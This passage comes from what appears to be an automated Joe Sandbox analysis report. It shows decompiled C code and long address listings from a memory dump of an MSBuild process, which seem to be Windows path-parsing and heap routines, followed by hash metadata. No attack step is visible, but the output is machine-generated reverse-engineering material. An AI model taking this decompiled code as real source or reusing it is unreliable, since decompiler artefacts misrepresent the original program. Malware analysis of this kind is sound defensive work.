                                            																_t334 = 0;
                                            															}
                                            															_t336 = _t334 & 0x000000ff;
                                            															__eflags = _t336;
                                            															_t427 =  *(_t528 - 0x88);
                                            															if(_t336 == 0) {
                                            																_t481 = _t479 + _t506;
                                            																__eflags = _t481;
                                            																 *(_t528 - 0x78) = _t481;
                                            																E0104F3E0(_t479 + _t427, _t457, _t506);
                                            																_t529 = _t529 + 0xc;
                                            															} else {
                                            																_t340 = _t336 - 1;
                                            																__eflags = _t340;
                                            																if(_t340 == 0) {
                                            																	E0104F3E0( *(_t528 - 0xb8), _t457, _t506);
                                            																	_t529 = _t529 + 0xc;
                                            																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                            																} else {
                                            																	__eflags = _t340 == 0;
                                            																	if(_t340 == 0) {
                                            																		__eflags = _t506 - 8;
                                            																		if(_t506 == 8) {
                                            																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                            																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                            																		}
                                            																	}
                                            																}
                                            															}
                                            															_t339 = 0x10;
                                            															_t519 = _t519 + _t339;
                                            															_t263 = _t528 - 0x8c;
                                            															 *_t263 =  *(_t528 - 0x8c) - 1;
                                            															__eflags =  *_t263;
                                            															_t479 =  *(_t528 - 0x78);
                                            														} while ( *_t263 != 0);
                                            														goto L87;
                                            													}
                                            												}
                                            											} else {
                                            												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                            												 *(_t528 - 0xa2) = _t392;
                                            												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                            												__eflags = _t469;
                                            												while(1) {
                                            													 *(_t528 - 0xe4) = _t511;
                                            													__eflags = _t392;
                                            													_t393 = _t427;
                                            													if(_t392 != 0) {
                                            														_t393 =  *((intOrPtr*)(_t469 + 4));
                                            													}
                                            													_t395 = (_t393 & 0x000000ff) - _t427;
                                            													__eflags = _t395;
                                            													if(_t395 == 0) {
                                            														_t511 = _t511 +  *_t469;
                                            														__eflags = _t511;
                                            													} else {
                                            														_t398 = _t395 - 1;
                                            														__eflags = _t398;
                                            														if(_t398 == 0) {
                                            															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                            															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                            														} else {
                                            															__eflags = _t398 == 1;
                                            															if(_t398 == 1) {
                                            																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                            																_t402 =  *_t469 & 0x0000ffff;
                                            																 *(_t528 - 0xac) = _t402;
                                            																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                            															}
                                            														}
                                            													}
                                            													__eflags = _t511 -  *(_t528 - 0xe4);
                                            													if(_t511 <  *(_t528 - 0xe4)) {
                                            														break;
                                            													}
                                            													_t397 =  *(_t528 - 0x88) + 1;
                                            													 *(_t528 - 0x88) = _t397;
                                            													_t469 = _t469 + 0x10;
                                            													__eflags = _t397 -  *(_t528 + 0x1c);
                                            													_t392 =  *(_t528 - 0xa2);
                                            													if(_t397 <  *(_t528 + 0x1c)) {
                                            														continue;
                                            													}
                                            													goto L45;
                                            												}
                                            												_t475 = 0x216;
                                            												 *(_t528 - 0x74) = 0x216;
                                            												goto L45;
                                            											}
                                            										} else {
                                            											asm("lock dec dword [eax+ecx*8+0x4]");
                                            											goto L16;
                                            										}
                                            									}
                                            									_t491 = E010D4CAB(_t306, _t528 - 0xa4);
                                            									 *(_t528 - 0x74) = _t491;
                                            									__eflags = _t491;
                                            									if(_t491 != 0) {
                                            										goto L91;
                                            									} else {
                                            										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                            										goto L20;
                                            									}
                                            								}
                                            								L16:
                                            								 *(_t528 - 0x74) = 0x1069;
                                            								L93:
                                            								_t298 =  *(_t528 - 0xd0) + 1;
                                            								 *(_t528 - 0xd0) = _t298;
                                            								_t474 = _t474 + _t511;
                                            								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                            								_t494 = 4;
                                            								__eflags = _t298 - _t494;
                                            								if(_t298 >= _t494) {
                                            									goto L100;
                                            								}
                                            								_t494 =  *(_t528 - 0xcc);
                                            								_t435 = _t298;
                                            								continue;
                                            							}
                                            							__eflags = _t494[2] | _t494[3];
                                            							if((_t494[2] | _t494[3]) == 0) {
                                            								goto L15;
                                            							}
                                            							goto L12;
                                            						}
                                            						__eflags = _t301;
                                            						if(_t301 != 0) {
                                            							goto L92;
                                            						}
                                            						goto L10;
                                            						L92:
                                            						goto L93;
                                            					}
                                            				} else {
                                            					_push(0x57);
                                            					L101:
                                            					return E0105D130(_t427, _t494, _t511);
                                            				}
                                            			}










































































                                            0x010d5ba5
                                            0x010d5baa
                                            0x010d5baf
                                            0x010d5bb4
                                            0x010d5bb6
                                            0x010d5bbc
                                            0x010d5bbe
                                            0x010d5bc4
                                            0x010d5bcd
                                            0x010d5bd3
                                            0x010d5bd6
                                            0x010d5bdc
                                            0x010d5be0
                                            0x010d5be3
                                            0x010d5beb
                                            0x010d5bf2
                                            0x010d5bf8
                                            0x010d5bfe
                                            0x010d5c04
                                            0x010d5c0e
                                            0x010d5c18
                                            0x010d5c1f
                                            0x010d5c25
                                            0x010d5c2a
                                            0x010d5c2c
                                            0x010d5c32
                                            0x010d5c3a
                                            0x010d5c3f
                                            0x010d5c42
                                            0x010d5c48
                                            0x010d5c5b
                                            0x010d5c5b
                                            0x010d5c2c
                                            0x010d5cb7
                                            0x010d5cb9
                                            0x010d5cbf
                                            0x010d5cc2
                                            0x010d5cca
                                            0x010d5ccb
                                            0x010d5ccb
                                            0x010d5cd1
                                            0x010d5cd7
                                            0x010d5cda
                                            0x010d5ce1
                                            0x010d5ce4
                                            0x010d5ce7
                                            0x010d5ced
                                            0x010d5cf3
                                            0x010d5cf9
                                            0x010d5cff
                                            0x010d5d08
                                            0x010d5d0a
                                            0x010d5d0e
                                            0x010d5d10
                                            0x00000000
                                            0x00000000
                                            0x010d5d16
                                            0x010d5d1a
                                            0x00000000
                                            0x00000000
                                            0x010d5d20
                                            0x010d5d22
                                            0x010d5d25
                                            0x010d5d2f
                                            0x010d5d2f
                                            0x010d5d33
                                            0x010d5d3d
                                            0x010d5d49
                                            0x010d5d4b
                                            0x00000000
                                            0x00000000
                                            0x010d5d5a
                                            0x010d5d5d
                                            0x010d5d60
                                            0x00000000
                                            0x00000000
                                            0x010d5d66
                                            0x010d5d69
                                            0x00000000
                                            0x00000000
                                            0x010d5d6f
                                            0x010d5d6f
                                            0x010d5d73
                                            0x010d5d79
                                            0x010d5d7f
                                            0x010d5d86
                                            0x010d5d95
                                            0x010d5d98
                                            0x010d5dba
                                            0x010d5dcb
                                            0x010d5dce
                                            0x010d5dd3
                                            0x010d5dd6
                                            0x010d5dd8
                                            0x010d5de6
                                            0x010d5dec
                                            0x010d5dee
                                            0x010d5df1
                                            0x010d5df3
                                            0x010d635a
                                            0x010d635a
                                            0x00000000
                                            0x010d635a
                                            0x010d5dfe
                                            0x010d5e02
                                            0x010d5e05
                                            0x010d5e07
                                            0x010d5e10
                                            0x010d5e13
                                            0x010d5e1b
                                            0x010d5e1c
                                            0x010d5e21
                                            0x010d5e22
                                            0x010d5e23
                                            0x010d5e25
                                            0x010d5e2a
                                            0x010d5e2c
                                            0x010d5e2e
                                            0x010d5e36
                                            0x010d5e39
                                            0x010d5e42
                                            0x010d5e47
                                            0x010d5e4d
                                            0x010d5e54
                                            0x010d5e54
                                            0x010d5e54
                                            0x010d5e2e
                                            0x010d5e5c
                                            0x010d5e5f
                                            0x010d5e62
                                            0x010d5e64
                                            0x010d5e6b
                                            0x010d5e70
                                            0x010d5e7a
                                            0x010d5e7a
                                            0x010d5e7a
                                            0x010d5e6b
                                            0x010d5e7e
                                            0x010d5e7f
                                            0x010d5e7f
                                            0x010d5e81
                                            0x010d5e87
                                            0x010d5e8b
                                            0x010d5e8c
                                            0x010d5e8c
                                            0x010d5e8c
                                            0x010d5e9a
                                            0x010d5e9c
                                            0x010d5ea2
                                            0x010d5ea6
                                            0x010d5f50
                                            0x010d5f50
                                            0x010d5f57
                                            0x010d5f66
                                            0x010d5f66
                                            0x010d5f66
                                            0x010d5f68
                                            0x010d5f6a
                                            0x010d63d0
                                            0x00000000
                                            0x010d5f70
                                            0x010d5f70
                                            0x010d5f91
                                            0x010d5f9c
                                            0x010d5f9e
                                            0x010d5fa4
                                            0x010d5fa6
                                            0x010d638c
                                            0x010d6392
                                            0x010d63a1
                                            0x010d63a7
                                            0x010d63af
                                            0x010d63af
                                            0x010d63bd
                                            0x010d63d8
                                            0x00000000
                                            0x010d63d8
                                            0x010d5fac
                                            0x010d5fb2
                                            0x010d5fb4
                                            0x010d5fbd
                                            0x010d5fc6
                                            0x010d5fce
                                            0x010d5fd4
                                            0x010d5fdc
                                            0x010d5fec
                                            0x010d5fed
                                            0x010d5fee
                                            0x010d5fef
                                            0x010d5ff9
                                            0x010d5ffa
                                            0x010d5ffb
                                            0x010d5ffc
                                            0x010d6000
                                            0x010d6004
                                            0x010d6012
                                            0x010d6012
                                            0x010d6018
                                            0x010d6019
                                            0x010d601a
                                            0x010d601b
                                            0x010d601c
                                            0x010d6020
                                            0x010d6059
                                            0x010d605c
                                            0x010d6061
                                            0x010d6061
                                            0x010d6022
                                            0x010d6022
                                            0x010d6022
                                            0x010d6025
                                            0x010d602a
                                            0x010d602b
                                            0x010d6031
                                            0x010d6037
                                            0x010d6038
                                            0x010d603e
                                            0x010d6048
                                            0x010d6049
                                            0x010d604a
                                            0x010d604b
                                            0x010d604c
                                            0x010d604d
                                            0x010d6053
                                            0x010d6054
                                            0x010d6054
                                            0x010d6062
                                            0x010d6065
                                            0x010d6067
                                            0x010d606a
                                            0x010d6070
                                            0x010d6075
                                            0x010d6076
                                            0x010d6081
                                            0x010d6087
                                            0x010d6095
                                            0x010d6099
                                            0x010d609e
                                            0x010d60a4
                                            0x010d60ae
                                            0x010d60b0
                                            0x010d60b3
                                            0x010d60b6
                                            0x010d60b8
                                            0x010d60ba
                                            0x010d60ba
                                            0x010d60ba
                                            0x010d60ba
                                            0x010d60be
                                            0x010d60c0
                                            0x010d60c5
                                            0x010d60c5
                                            0x010d60c5
                                            0x010d60c6
                                            0x010d60cd
                                            0x010d6114
                                            0x010d60cf
                                            0x010d60cf
                                            0x010d60d4
                                            0x010d60d5
                                            0x010d60da
                                            0x010d60db
                                            0x010d60e1
                                            0x010d60e2
                                            0x010d60e8
                                            0x010d60f8
                                            0x010d60fd
                                            0x010d60fe
                                            0x010d6102
                                            0x010d6104
                                            0x010d6107
                                            0x010d6109
                                            0x010d610b
                                            0x010d610b
                                            0x010d610b
                                            0x010d610b
                                            0x010d610f
                                            0x010d610f
                                            0x010d6117
                                            0x010d611a
                                            0x010d611f
                                            0x010d6125
                                            0x010d6134
                                            0x010d6139
                                            0x010d613f
                                            0x010d6146
                                            0x010d6148
                                            0x010d614b
                                            0x010d614d
                                            0x010d614f
                                            0x010d614f
                                            0x010d614f
                                            0x010d614f
                                            0x010d6153
                                            0x010d6159
                                            0x010d6159
                                            0x010d615c
                                            0x010d6163
                                            0x010d6169
                                            0x010d616c
                                            0x010d6172
                                            0x010d6181
                                            0x010d6186
                                            0x010d6187
                                            0x010d618b
                                            0x010d6191
                                            0x010d6195
                                            0x010d61a3
                                            0x010d61bb
                                            0x010d61c0
                                            0x010d61c3
                                            0x010d61cc
                                            0x010d61d0
                                            0x010d61dc
                                            0x010d61de
                                            0x010d61e1
                                            0x010d61e4
                                            0x010d61e6
                                            0x010d61e8
                                            0x010d61e8
                                            0x010d61e8
                                            0x010d61e8
                                            0x010d61e6
                                            0x010d61ec
                                            0x010d61f3
                                            0x010d6203
                                            0x010d6209
                                            0x010d620a
                                            0x010d6216
                                            0x010d621d
                                            0x010d6227
                                            0x010d6241
                                            0x010d6246
                                            0x010d624c
                                            0x010d6257
                                            0x010d6259
                                            0x010d625c
                                            0x010d625e
                                            0x010d6260
                                            0x010d6260
                                            0x010d6260
                                            0x010d6260
                                            0x010d625e
                                            0x010d6264
                                            0x010d6267
                                            0x010d6269
                                            0x010d6315
                                            0x010d6315
                                            0x010d631b
                                            0x010d631e
                                            0x010d6324
                                            0x010d6327
                                            0x010d632f
                                            0x010d6330
                                            0x010d6333
                                            0x010d633a
                                            0x010d633c
                                            0x010d6335
                                            0x010d6335
                                            0x010d6335
                                            0x010d633f
                                            0x010d6342
                                            0x010d634c
                                            0x010d6352
                                            0x010d6355
                                            0x010d6355
                                            0x010d6359
                                            0x00000000
                                            0x010d626f
                                            0x010d6275
                                            0x010d6275
                                            0x010d6278
                                            0x010d627e
                                            0x010d627e
                                            0x010d6281
                                            0x010d6287
                                            0x010d628d
                                            0x010d6298
                                            0x010d629c
                                            0x010d62a2
                                            0x010d629e
                                            0x010d629e
                                            0x010d629e
                                            0x010d62a7
                                            0x010d62a7
                                            0x010d62aa
                                            0x010d62b0
                                            0x010d62f0
                                            0x010d62f0
                                            0x010d62f2
                                            0x010d62f8
                                            0x010d62fd
                                            0x010d62b2
                                            0x010d62b2
                                            0x010d62b2
                                            0x010d62b5
                                            0x010d62dd
                                            0x010d62e2
                                            0x010d62e5
                                            0x010d62b7
                                            0x010d62b8
                                            0x010d62bb
                                            0x010d62bd
                                            0x010d62c0
                                            0x010d62c4
                                            0x010d62cd
                                            0x010d62cd
                                            0x010d62c0
                                            0x010d62bb
                                            0x010d62b5
                                            0x010d6302
                                            0x010d6303
                                            0x010d6305
                                            0x010d6305
                                            0x010d6305
                                            0x010d630c
                                            0x010d630c
                                            0x00000000
                                            0x010d627e
                                            0x010d6269
                                            0x010d5eac
                                            0x010d5ebb
                                            0x010d5ebe
                                            0x010d5ecb
                                            0x010d5ecb
                                            0x010d5ece
                                            0x010d5ece
                                            0x010d5ed4
                                            0x010d5ed7
                                            0x010d5ed9
                                            0x010d5edb
                                            0x010d5edb
                                            0x010d5ee1
                                            0x010d5ee1
                                            0x010d5ee3
                                            0x010d5f20
                                            0x010d5f20
                                            0x010d5ee5
                                            0x010d5ee5
                                            0x010d5ee5
                                            0x010d5ee8
                                            0x010d5f11
                                            0x010d5f18
                                            0x010d5eea
                                            0x010d5eea
                                            0x010d5eed
                                            0x010d5ef2
                                            0x010d5ef8
                                            0x010d5efb
                                            0x010d5f0a
                                            0x010d5f0a
                                            0x010d5eed
                                            0x010d5ee8
                                            0x010d5f22
                                            0x010d5f28
                                            0x00000000
                                            0x00000000
                                            0x010d5f30
                                            0x010d5f31
                                            0x010d5f37
                                            0x010d5f3a
                                            0x010d5f3d
                                            0x010d5f44
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010d5f46
                                            0x010d5f48
                                            0x010d5f4d
                                            0x00000000
                                            0x010d5f4d
                                            0x010d5dda
                                            0x010d5ddf
                                            0x00000000
                                            0x010d5ddf
                                            0x010d5dd8
                                            0x010d5da7
                                            0x010d5da9
                                            0x010d5dac
                                            0x010d5dae
                                            0x00000000
                                            0x010d5db4
                                            0x010d5db4
                                            0x00000000
                                            0x010d5db4
                                            0x010d5dae
                                            0x010d5d88
                                            0x010d5d8d
                                            0x010d6363
                                            0x010d6369
                                            0x010d636a
                                            0x010d6370
                                            0x010d6372
                                            0x010d637a
                                            0x010d637b
                                            0x010d637d
                                            0x00000000
                                            0x00000000
                                            0x010d637f
                                            0x010d6385
                                            0x00000000
                                            0x010d6385
                                            0x010d5d38
                                            0x010d5d3b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010d5d3b
                                            0x010d5d27
                                            0x010d5d29
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010d6360
                                            0x00000000
                                            0x010d6360
                                            0x010d5c10
                                            0x010d5c10
                                            0x010d63da
                                            0x010d63e5
                                            0x010d63e5

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7cc180246a42be342de7d80e17c73ea51f28c9b4482ddc8507a3e51d3346dbd
                                            • Instruction ID: 9e40636c31cea1ccc2861869785432ad9f47f81d3b205445f2b4b2363e2a756c
                                            • Opcode Fuzzy Hash: a7cc180246a42be342de7d80e17c73ea51f28c9b4482ddc8507a3e51d3346dbd
                                            • Instruction Fuzzy Hash: 074238759003298FDB64CF68C881BAABBF1FF49304F1481EAD98DAB242D7759985CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E01024120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                            				signed int _v8;
                                            				void* _v20;
                                            				signed int _v24;
                                            				char _v532;
                                            				char _v540;
                                            				signed short _v544;
                                            				signed int _v548;
                                            				signed short* _v552;
                                            				signed short _v556;
                                            				signed short* _v560;
                                            				signed short* _v564;
                                            				signed short* _v568;
                                            				void* _v570;
                                            				signed short* _v572;
                                            				signed short _v576;
                                            				signed int _v580;
                                            				char _v581;
                                            				void* _v584;
                                            				unsigned int _v588;
                                            				signed short* _v592;
                                            				void* _v597;
                                            				void* _v600;
                                            				void* _v604;
                                            				void* _v609;
                                            				void* _v616;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				unsigned int _t161;
                                            				signed int _t162;
                                            				unsigned int _t163;
                                            				void* _t169;
                                            				signed short _t173;
                                            				signed short _t177;
                                            				signed short _t181;
                                            				unsigned int _t182;
                                            				signed int _t185;
                                            				signed int _t213;
                                            				signed int _t225;
                                            				short _t233;
                                            				signed char _t234;
                                            				signed int _t242;
                                            				signed int _t243;
                                            				signed int _t244;
                                            				signed int _t245;
                                            				signed int _t250;
                                            				void* _t251;
                                            				signed short* _t254;
                                            				void* _t255;
                                            				signed int _t256;
                                            				void* _t257;
                                            				signed short* _t260;
                                            				signed short _t265;
                                            				signed short* _t269;
                                            				signed short _t271;
                                            				signed short** _t272;
                                            				signed short* _t275;
                                            				signed short _t282;
                                            				signed short _t283;
                                            				signed short _t290;
                                            				signed short _t299;
                                            				signed short _t307;
                                            				signed int _t308;
                                            				signed short _t311;
                                            				signed short* _t315;
                                            				signed short _t316;
                                            				void* _t317;
                                            				void* _t319;
                                            				signed short* _t321;
                                            				void* _t322;
                                            				void* _t323;
                                            				unsigned int _t324;
                                            				signed int _t325;
                                            				void* _t326;
                                            				signed int _t327;
                                            				signed int _t329;
                                            
                                            				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                            				_v8 =  *0x10fd360 ^ _t329;
                                            				_t157 = _a8;
                                            				_t321 = _a4;
                                            				_t315 = __edx;
                                            				_v548 = __ecx;
                                            				_t305 = _a20;
                                            				_v560 = _a12;
                                            				_t260 = _a16;
                                            				_v564 = __edx;
                                            				_v580 = _a8;
                                            				_v572 = _t260;
                                            				_v544 = _a20;
                                            				if( *__edx <= 8) {
                                            					L3:
                                            					if(_t260 != 0) {
                                            						 *_t260 = 0;
                                            					}
                                            					_t254 =  &_v532;
                                            					_v588 = 0x208;
                                            					if((_v548 & 0x00000001) != 0) {
                                            						_v556 =  *_t315;
                                            						_v552 = _t315[2];
                                            						_t161 = E0103F232( &_v556);
                                            						_t316 = _v556;
                                            						_v540 = _t161;
                                            						goto L17;
                                            					} else {
                                            						_t306 = 0x208;
                                            						_t298 = _t315;
                                            						_t316 = E01026E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                            						if(_t316 == 0) {
                                            							L68:
                                            							_t322 = 0xc0000033;
                                            							goto L39;
                                            						} else {
                                            							while(_v581 == 0) {
                                            								_t233 = _v588;
                                            								if(_t316 > _t233) {
                                            									_t234 = _v548;
                                            									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                            										_t254 = L01024620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                            										if(_t254 == 0) {
                                            											_t169 = 0xc0000017;
                                            										} else {
                                            											_t298 = _v564;
                                            											_v588 = _t316;
                                            											_t306 = _t316;
                                            											_t316 = E01026E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                            											if(_t316 != 0) {
                                            												continue;
                                            											} else {
                                            												goto L68;
                                            											}
                                            										}
                                            									} else {
                                            										goto L90;
                                            									}
                                            								} else {
                                            									_v556 = _t316;
                                            									 *((short*)(_t329 + 0x32)) = _t233;
                                            									_v552 = _t254;
                                            									if(_t316 < 2) {
                                            										L11:
                                            										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                            											_t161 = 5;
                                            										} else {
                                            											if(_t316 < 6) {
                                            												L87:
                                            												_t161 = 3;
                                            											} else {
                                            												_t242 = _t254[2] & 0x0000ffff;
                                            												if(_t242 != 0x5c) {
                                            													if(_t242 == 0x2f) {
                                            														goto L16;
                                            													} else {
                                            														goto L87;
                                            													}
                                            													goto L101;
                                            												} else {
                                            													L16:
                                            													_t161 = 2;
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										_t243 =  *_t254 & 0x0000ffff;
                                            										if(_t243 == 0x5c || _t243 == 0x2f) {
                                            											if(_t316 < 4) {
                                            												L81:
                                            												_t161 = 4;
                                            												goto L17;
                                            											} else {
                                            												_t244 = _t254[1] & 0x0000ffff;
                                            												if(_t244 != 0x5c) {
                                            													if(_t244 == 0x2f) {
                                            														goto L60;
                                            													} else {
                                            														goto L81;
                                            													}
                                            												} else {
                                            													L60:
                                            													if(_t316 < 6) {
                                            														L83:
                                            														_t161 = 1;
                                            														goto L17;
                                            													} else {
                                            														_t245 = _t254[2] & 0x0000ffff;
                                            														if(_t245 != 0x2e) {
                                            															if(_t245 == 0x3f) {
                                            																goto L62;
                                            															} else {
                                            																goto L83;
                                            															}
                                            														} else {
                                            															L62:
                                            															if(_t316 < 8) {
                                            																L85:
                                            																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                            																goto L17;
                                            															} else {
                                            																_t250 = _t254[3] & 0x0000ffff;
                                            																if(_t250 != 0x5c) {
                                            																	if(_t250 == 0x2f) {
                                            																		goto L64;
                                            																	} else {
                                            																		goto L85;
                                            																	}
                                            																} else {
                                            																	L64:
                                            																	_t161 = 6;
                                            																	goto L17;
                                            																}
                                            															}
                                            														}
                                            													}
                                            												}
                                            											}
                                            											goto L101;
                                            										} else {
                                            											goto L11;
                                            										}
                                            									}
                                            									L17:
                                            									if(_t161 != 2) {
                                            										_t162 = _t161 - 1;
                                            										if(_t162 > 5) {
                                            											goto L18;
                                            										} else {
                                            											switch( *((intOrPtr*)(_t162 * 4 +  &M010245F8))) {
                                            												case 0:
                                            													_v568 = 0xfe1078;
                                            													__eax = 2;
                                            													goto L20;
                                            												case 1:
                                            													goto L18;
                                            												case 2:
                                            													_t163 = 4;
                                            													goto L19;
                                            											}
                                            										}
                                            										goto L41;
                                            									} else {
                                            										L18:
                                            										_t163 = 0;
                                            										L19:
                                            										_v568 = 0xfe11c4;
                                            									}
                                            									L20:
                                            									_v588 = _t163;
                                            									_v564 = _t163 + _t163;
                                            									_t306 =  *_v568 & 0x0000ffff;
                                            									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                            									_v576 = _t265;
                                            									if(_t265 > 0xfffe) {
                                            										L90:
                                            										_t322 = 0xc0000106;
                                            									} else {
                                            										if(_t321 != 0) {
                                            											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                            												if(_v580 != 0) {
                                            													goto L23;
                                            												} else {
                                            													_t322 = 0xc0000106;
                                            													goto L39;
                                            												}
                                            											} else {
                                            												_t177 = _t306;
                                            												goto L25;
                                            											}
                                            											goto L101;
                                            										} else {
                                            											if(_v580 == _t321) {
                                            												_t322 = 0xc000000d;
                                            											} else {
                                            												L23:
                                            												_t173 = L01024620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                            												_t269 = _v592;
                                            												_t269[2] = _t173;
                                            												if(_t173 == 0) {
                                            													_t322 = 0xc0000017;
                                            												} else {
                                            													_t316 = _v556;
                                            													 *_t269 = 0;
                                            													_t321 = _t269;
                                            													_t269[1] = _v576;
                                            													_t177 =  *_v568 & 0x0000ffff;
                                            													L25:
                                            													_v580 = _t177;
                                            													if(_t177 == 0) {
                                            														L29:
                                            														_t307 =  *_t321 & 0x0000ffff;
                                            													} else {
                                            														_t290 =  *_t321 & 0x0000ffff;
                                            														_v576 = _t290;
                                            														_t310 = _t177 & 0x0000ffff;
                                            														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                            															_t307 =  *_t321 & 0xffff;
                                            														} else {
                                            															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                            															E0104F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                            															_t329 = _t329 + 0xc;
                                            															_t311 = _v580;
                                            															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                            															 *_t321 = _t225;
                                            															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                            																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                            															}
                                            															goto L29;
                                            														}
                                            													}
                                            													_t271 = _v556 - _v588 + _v588;
                                            													_v580 = _t307;
                                            													_v576 = _t271;
                                            													if(_t271 != 0) {
                                            														_t308 = _t271 & 0x0000ffff;
                                            														_v588 = _t308;
                                            														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                            															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                            															E0104F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                            															_t329 = _t329 + 0xc;
                                            															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                            															 *_t321 = _t213;
                                            															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                            																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                            															}
                                            														}
                                            													}
                                            													_t272 = _v560;
                                            													if(_t272 != 0) {
                                            														 *_t272 = _t321;
                                            													}
                                            													_t306 = 0;
                                            													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                            													_t275 = _v572;
                                            													if(_t275 != 0) {
                                            														_t306 =  *_t275;
                                            														if(_t306 != 0) {
                                            															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                            														}
                                            													}
                                            													_t181 = _v544;
                                            													if(_t181 != 0) {
                                            														 *_t181 = 0;
                                            														 *((intOrPtr*)(_t181 + 4)) = 0;
                                            														 *((intOrPtr*)(_t181 + 8)) = 0;
                                            														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                            														if(_v540 == 5) {
                                            															_t182 = E010052A5(1);
                                            															_v588 = _t182;
                                            															if(_t182 == 0) {
                                            																E0101EB70(1, 0x10f79a0);
                                            																goto L38;
                                            															} else {
                                            																_v560 = _t182 + 0xc;
                                            																_t185 = E0101AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                            																if(_t185 == 0) {
                                            																	_t324 = _v588;
                                            																	goto L97;
                                            																} else {
                                            																	_t306 = _v544;
                                            																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                            																	 *(_t306 + 4) = _t282;
                                            																	_v576 = _t282;
                                            																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                            																	 *_t306 = _t325;
                                            																	if( *_t282 == 0x5c) {
                                            																		_t149 = _t325 - 2; // -2
                                            																		_t283 = _t149;
                                            																		 *_t306 = _t283;
                                            																		 *(_t306 + 4) = _v576 + 2;
                                            																		_t185 = _t283 & 0x0000ffff;
                                            																	}
                                            																	_t324 = _v588;
                                            																	 *(_t306 + 2) = _t185;
                                            																	if((_v548 & 0x00000002) == 0) {
                                            																		L97:
                                            																		asm("lock xadd [esi], eax");
                                            																		if((_t185 | 0xffffffff) == 0) {
                                            																			_push( *((intOrPtr*)(_t324 + 4)));
                                            																			E010495D0();
                                            																			L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                            																		}
                                            																	} else {
                                            																		 *(_t306 + 0xc) = _t324;
                                            																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                            																	}
                                            																	goto L38;
                                            																}
                                            															}
                                            															goto L41;
                                            														}
                                            													}
                                            													L38:
                                            													_t322 = 0;
                                            												}
                                            											}
                                            										}
                                            									}
                                            									L39:
                                            									if(_t254 !=  &_v532) {
                                            										L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                            									}
                                            									_t169 = _t322;
                                            								}
                                            								goto L41;
                                            							}
                                            							goto L68;
                                            						}
                                            					}
                                            					L41:
                                            					_pop(_t317);
                                            					_pop(_t323);
                                            					_pop(_t255);
                                            					return E0104B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                            				} else {
                                            					_t299 = __edx[2];
                                            					if( *_t299 == 0x5c) {
                                            						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                            						if(_t256 != 0x5c) {
                                            							if(_t256 != 0x3f) {
                                            								goto L2;
                                            							} else {
                                            								goto L50;
                                            							}
                                            						} else {
                                            							L50:
                                            							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                            								goto L2;
                                            							} else {
